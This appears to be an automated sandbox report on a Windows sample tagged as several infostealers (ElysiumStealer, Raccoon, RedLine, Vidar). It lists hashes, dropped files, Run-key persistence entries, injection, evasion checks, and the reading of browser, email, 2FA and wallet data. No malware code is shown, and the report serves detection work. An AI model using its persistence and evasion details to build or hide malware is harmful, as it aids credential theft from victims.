elysiumstealer | 4139739d5bfa8330e095a68c658040fb42c75cde651e3baa8afafb4fc557b202

Analysis

max time kernel
79s
max time network
151s
platform
windows10_x64
resource
win10v20210408
submitted
16-04-2021 23:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

55CB4375683875666481DC417B20B757.exe
Size

6.7MB
MD5

55cb4375683875666481dc417b20b757
SHA1

a2a4a445ec789ab4410033a484182f334415d0d7
SHA256

4139739d5bfa8330e095a68c658040fb42c75cde651e3baa8afafb4fc557b202
SHA512

17a5fe13e5fa867a5ee34fe5b859636aecba59d552cb5613a02469747205d29c8d4c7ed2b62aa62691155665005e63c43e58768a40e2c4ddbc60cc0d3a2bef34

Score

10^/10

elysiumstealer raccoon redline vidar discovery evasion infostealer persistence spyware stealer upx vmprotect

Malware Config

Signatures

ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
stealer elysiumstealer
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 4872 created 4124 4872 svchost.exe app.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

description	pid	process	target process
PID 4872 created 4124	4872	svchost.exe	app.exe

Drops file in Drivers directory 2 IoCs

Processes:

ysAGEL.exealpATCHInO.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	ysAGEL.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	alpATCHInO.exe

Executes dropped EXE 42 IoCs

Processes:

hjjgaa.exeRunWW.exejg7_7wjg.exeguihuali-game.exeThree.exeLabPicV3.exelylal220.exeJoSetp.exeLabPicV3.tmpBarSetpFile.exeLOQn7WyBrhly.exelylal220.tmpjfiag3g_gg.exe2520276.exe7503414.exealpATCHInO.exe6876167.exe3648716.exeysAGEL.exe1706868.exe7945204.exeWindows Host.exejfiag3g_gg.exeprolab.exeprolab.tmpWibekizheny.exeKudyhuvaqae.exegpooe.exejfiag3g_gg.exegoogle-game.exeaskinstall31.exejfiag3g_gg.exey1.exe1706868.exe7945204.exesetup_10.2_mix.exetoolspab1.exetoolspab1.exeSunLabsPlayer.exedf4e3841.exeapp.exeapp.exe

pid	process
2640	hjjgaa.exe
3020	RunWW.exe
3776	jg7_7wjg.exe
2812	guihuali-game.exe
3108	Three.exe
3964	LabPicV3.exe
208	lylal220.exe
3656	JoSetp.exe
1956	LabPicV3.tmp
928	BarSetpFile.exe
1496	LOQn7WyBrhly.exe
716	lylal220.tmp
2328	jfiag3g_gg.exe
2296	2520276.exe
1280	7503414.exe
2260	alpATCHInO.exe
388	6876167.exe
2444	3648716.exe
4188	ysAGEL.exe
4352	1706868.exe
4392	7945204.exe
4256	Windows Host.exe
4584	jfiag3g_gg.exe
3996	prolab.exe
3888	prolab.tmp
4680	Wibekizheny.exe
1816	Kudyhuvaqae.exe
5168	gpooe.exe
5396	jfiag3g_gg.exe
2892	google-game.exe
5560	askinstall31.exe
5760	jfiag3g_gg.exe
7028	y1.exe
6620	1706868.exe
6628	7945204.exe
5000	setup_10.2_mix.exe
6984	toolspab1.exe
2152	toolspab1.exe
6584	SunLabsPlayer.exe
2160	df4e3841.exe
4124	app.exe
7152	app.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe	vmprotect
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe	vmprotect
behavioral2/memory/2640-143-0x0000000000CF0000-0x0000000001346000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Wibekizheny.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Wibekizheny.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 23 IoCs

Processes:

LabPicV3.tmplylal220.tmprundll32.exeRunWW.exerundll32.exey1.exetoolspab1.exeSunLabsPlayer.exedf4e3841.exe

pid	process
1956	LabPicV3.tmp
716	lylal220.tmp
2800	rundll32.exe
3020	RunWW.exe
3020	RunWW.exe
4224	rundll32.exe
7028	y1.exe
7028	y1.exe
7028	y1.exe
7028	y1.exe
7028	y1.exe
2152	toolspab1.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
2160	df4e3841.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

hjjgaa.exe3648716.exealpATCHInO.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	3648716.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Wytidewony.exe\""	alpATCHInO.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery
T1063

Processes:

sc.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab sc.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 ip-api.com
76 ip-api.com
294 icanhazip.com

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab	sc.exe

flow	ioc
11	ip-api.com
76	ip-api.com
294	icanhazip.com

Drops file in System32 directory 3 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\SPZGXR6I.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\SPZGXR6I.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

svchost.exeLOQn7WyBrhly.exe1706868.exe7945204.exetoolspab1.exe

description	pid	process	target process
PID 1920 set thread context of 4236	1920	svchost.exe	svchost.exe
PID 1496 set thread context of 6136	1496	LOQn7WyBrhly.exe	AddInProcess32.exe
PID 4352 set thread context of 6620	4352	1706868.exe	1706868.exe
PID 4392 set thread context of 6628	4392	7945204.exe	7945204.exe
PID 6984 set thread context of 2152	6984	toolspab1.exe	toolspab1.exe

Drops file in Program Files directory 64 IoCs

Processes:

SunLabsPlayer.exe55CB4375683875666481DC417B20B757.exeprolab.tmpsetup_10.2_mix.exeguihuali-game.exe

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe	55CB4375683875666481DC417B20B757.exe
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe	55CB4375683875666481DC417B20B757.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Imaging.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-7SLQL.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\d.INTEG.RAW
File opened for modification	C:\Program Files (x86)\Advanced Trip\TrayIcon3.ico	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe	55CB4375683875666481DC417B20B757.exe
File created	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\tmp.edb
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\Pictures Lab.exe	prolab.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\unins.vbs	guihuali-game.exe
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\d.jfm
File opened for modification	C:\Program Files (x86)\Advanced Trip\lang\en-US.xml	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_3_hover.png	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\TrayIcon4.ico	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\jp2native.dll	guihuali-game.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_normal.png	setup_10.2_mix.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\TrayIcon2.ico	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\Picture Lab\is-0F72S.tmp	prolab.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png	SunLabsPlayer.exe

Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1808	3656	WerFault.exe	JoSetp.exe
7076	4124	WerFault.exe	app.exe
4308	5064	WerFault.exe	8D5F.exe
3888	7120	WerFault.exe	1B99.exe
6296	4828	WerFault.exe	1DAE.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspab1.exedf4e3841.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	df4e3841.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	df4e3841.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	df4e3841.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RunWW.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RunWW.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RunWW.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5768 schtasks.exe
5992 schtasks.exe
Delays execution with timeout.exe 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

900 timeout.exe
5892 timeout.exe
988 timeout.exe
4636 timeout.exe
5616 timeout.exe
5328 timeout.exe
4592 timeout.exe
5876 timeout.exe
1136 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

6748 bitsadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4268 taskkill.exe
6976 taskkill.exe

pid	process
5768	schtasks.exe
5992	schtasks.exe

pid	process
900	timeout.exe
5892	timeout.exe
988	timeout.exe
4636	timeout.exe
5616	timeout.exe
5328	timeout.exe
4592	timeout.exe
5876	timeout.exe
1136	timeout.exe

pid	process
6748	bitsadmin.exe

pid	process
4268	taskkill.exe
6976	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

app.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	app.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	app.exe
